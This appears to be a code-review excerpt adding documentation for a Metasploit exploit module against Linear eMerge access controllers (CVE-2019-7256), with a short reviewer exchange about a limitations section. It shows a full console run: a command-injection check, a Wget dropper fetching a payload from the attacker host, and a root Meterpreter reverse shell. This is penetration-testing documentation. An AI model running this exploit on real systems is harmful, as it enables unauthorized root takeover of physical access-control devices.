documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md

```diff
@@ -0,0 +1,188 @@
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
+target => 1
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.177188547007972 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/n6tUft9RrS
+[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
+[*] Sending payload to 127.0.0.1 (Wget)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux 3.14.54)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
```

Comment:
```suggestion
```
This has been an issue we've been chasing. Unfortunately, this appears to be only an issue on a subset of armle devices, and I don't have any that display the behavior. See https://github.com/rapid7/metasploit-framework/issues/16107.  Having it in the documentation will be confusing when we fix this.

Reply:
ok, let me remove the first paragraph from the limitations section.